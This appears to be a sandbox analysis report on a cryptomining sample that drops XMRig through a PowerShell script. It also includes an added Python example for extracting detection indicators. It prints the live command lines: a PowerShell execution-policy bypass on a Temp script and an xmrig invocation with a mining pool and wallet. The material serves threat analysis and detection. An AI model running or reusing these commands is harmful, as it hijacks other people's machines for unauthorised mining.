Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-25 15:43
Signatures
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches recorded; the report captured no description, indicator, process or target for any of them | | | |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 380 wrote to memory of 3832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 380 wrote to memory of 3832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
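The two command lines and the network rows above carry the indicators worth turning into detections: a PowerShell launch with `-ExecutionPolicy bypass` on a script in the user's Temp directory, a dropped `xmrig.exe` in the same directory, and the miner's `-o stratum+ssl://rx.unmineable.com:443` / `-u XMR:<wallet>.<worker>` arguments (the `-a rx` selects RandomX, and the SeLockMemoryPrivilege requests in the signature table are consistent with XMRig trying to enable large pages for it). The Python below is an added example, not part of the sandbox report or of any tool it names: it parses those command lines into pool, wallet, worker and algorithm, flags the behaviours the report's signatures describe, and separates the real pool session from the DNS and reverse-DNS noise in the network table. The sample command lines and network rows are copied from the report; the flag names and helper functions are this example's own.

```python
import re

# Command lines copied from the report's Processes section (behavioral27); they
# are the sample input for this example and nothing else is assumed about the host.
COMMAND_LINES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x',
]

# A subset of the report's Network table as (country, destination, domain, proto).
NETWORK_ROWS = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "185.199.111.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("GB", "161.35.34.195:443", "rx.unmineable.com", "tcp"),
    ("US", "8.8.8.8:53", "195.34.35.161.in-addr.arpa", "udp"),
]

USER_TEMP = re.compile(r'\\AppData\\Local\\Temp\\', re.IGNORECASE)


def _opt(cmdline, *names):
    """Value of the first option in *names* ('-o', '--url', ...) found on the line.
    Both '-o value' and '--url=value' spellings are accepted."""
    for name in names:
        m = re.search(r'(?:^|\s)' + re.escape(name) + r'(?:\s+|=)(\S+)', cmdline)
        if m:
            return m.group(1)
    return None


def parse_miner_cmdline(cmdline):
    """Extract pool/wallet/worker/algo from an XMRig-style command line.
    Returns None when the line has no stratum pool URL, so it doubles as a check."""
    url = _opt(cmdline, "-o", "--url")
    if not url or "stratum" not in url.split("://", 1)[0]:
        return None
    scheme, _, hostport = url.partition("://")
    host, sep, port = hostport.rpartition(":")
    if not sep:                      # no explicit port on the pool URL
        host, port = hostport, ""
    user = _opt(cmdline, "-u", "--user") or ""
    # unMineable users look like COIN:ADDRESS.WORKER; plain pools use ADDRESS[.WORKER]
    coin, sep, rest = user.partition(":")
    if not sep:
        coin, rest = None, user
    wallet, _, worker = rest.partition(".")
    return {
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "tls": "ssl" in scheme or "tls" in scheme,
        "algo": _opt(cmdline, "-a", "--algo"),
        "coin": coin,
        "wallet": wallet,
        "worker": worker or None,
        "password": _opt(cmdline, "-p", "--pass"),
    }


def classify_process(cmdline):
    """Behavioural flags for one command line, mirroring the report's signatures.
    Flag names are this example's own, not a sandbox vocabulary."""
    flags = []
    if re.search(r'-ExecutionPolicy\s+bypass', cmdline, re.IGNORECASE):
        flags.append("powershell_executionpolicy_bypass")
    if USER_TEMP.search(cmdline):
        flags.append("path_in_user_temp")
    if parse_miner_cmdline(cmdline):
        flags.append("cryptominer_cmdline")
    return flags


def pool_connections(rows, pool_host):
    """Network rows that are real TCP sessions to the pool host. The UDP rows are
    DNS lookups sent to 8.8.8.8:53 (including reverse-DNS noise) and are skipped."""
    return [r for r in rows if r[3] == "tcp" and r[2] == pool_host]


if __name__ == "__main__":
    for line in COMMAND_LINES:
        print(classify_process(line), line[:60])
    miner = parse_miner_cmdline(COMMAND_LINES[1])
    print(miner)
    print(pool_connections(NETWORK_ROWS, miner["pool_host"]))
```

In practice the same functions run over Sysmon event ID 1 `CommandLine` fields and event ID 3 / DNS telemetry; the wallet and worker strings are the most stable pivot across re-packagings of this campaign, since the pool host and the dropped path can change while the payout address stays the same.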
Files
memory/380-0-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojnlrccv.3d4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/380-10-0x000001E2FB5D0000-0x000001E2FB5F2000-memory.dmp
memory/380-11-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-12-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-14-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-15-0x000001E2FB860000-0x000001E2FB872000-memory.dmp
memory/380-16-0x000001E2FB850000-0x000001E2FB85A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3832-47-0x000001D28C220000-0x000001D28C240000-memory.dmp
memory/3832-48-0x000001D28C3B0000-0x000001D28C3D0000-memory.dmp
memory/3832-49-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-50-0x000001D28C3D0000-0x000001D28C3F0000-memory.dmp
memory/3832-51-0x000001D28C3F0000-0x000001D28C410000-memory.dmp
memory/3832-52-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/380-53-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
memory/380-54-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/380-56-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/3832-55-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-57-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-58-0x000001D28C3D0000-0x000001D28C3F0000-memory.dmp
memory/3832-59-0x000001D28C3F0000-0x000001D28C410000-memory.dmp
memory/3832-60-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-61-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-62-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-63-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-64-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-65-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-66-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-67-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-68-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-69-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-70-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-71-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-72-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-73-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-74-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-75-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-76-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-77-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-78-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-79-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-80-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-81-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-82-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-83-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-84-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-85-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-86-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-87-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-88-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-89-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-90-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-91-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-92-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-93-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-94-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-95-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-96-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-97-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-98-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-99-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-100-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-101-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-102-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-103-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-104-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-105-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-106-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-107-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-108-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-109-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-110-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-111-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-112-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-113-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-114-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-115-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-116-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-117-0x00007FF613D50000-0x00007FF614983000-memory.dmp
memory/3832-118-0x00007FF613D50000-0x00007FF614983000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:53
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1750s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches recorded; the report captured no description, indicator, process or target for any of them | | | |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 1108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4144 wrote to memory of 1108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4144-2-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/4144-5-0x00000263215B0000-0x00000263215D2000-memory.dmp
memory/4144-8-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-9-0x0000026339BB0000-0x0000026339C26000-memory.dmp
memory/4144-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ncihguv0.2de.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4144-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-29-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/4144-30-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-31-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-32-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/4144-52-0x0000026339D30000-0x0000026339D42000-memory.dmp
memory/4144-65-0x0000026339BA0000-0x0000026339BAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1108-94-0x000001AF51BE0000-0x000001AF51C00000-memory.dmp
memory/1108-95-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-96-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-97-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-98-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-99-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-100-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-101-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-102-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-103-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-104-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-105-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-106-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-107-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-108-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-109-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-110-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-111-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-112-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-113-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-114-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-115-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-116-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-117-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-118-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-119-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-120-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-121-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-122-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-123-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-124-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-125-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-126-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-127-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-128-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-129-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-130-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-131-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-132-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-133-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-134-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-135-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-136-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-137-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-138-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-139-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-140-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-141-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-142-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-143-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-144-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-145-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-146-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-147-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-148-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-149-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-150-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-151-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-152-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-153-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-154-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-155-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-156-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
memory/1108-157-0x00007FF6FC0E0000-0x00007FF6FCD13000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:05
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1769s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches recorded; the report captured no description, indicator, process or target for any of them | | | |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 388 wrote to memory of 904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 388 wrote to memory of 904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
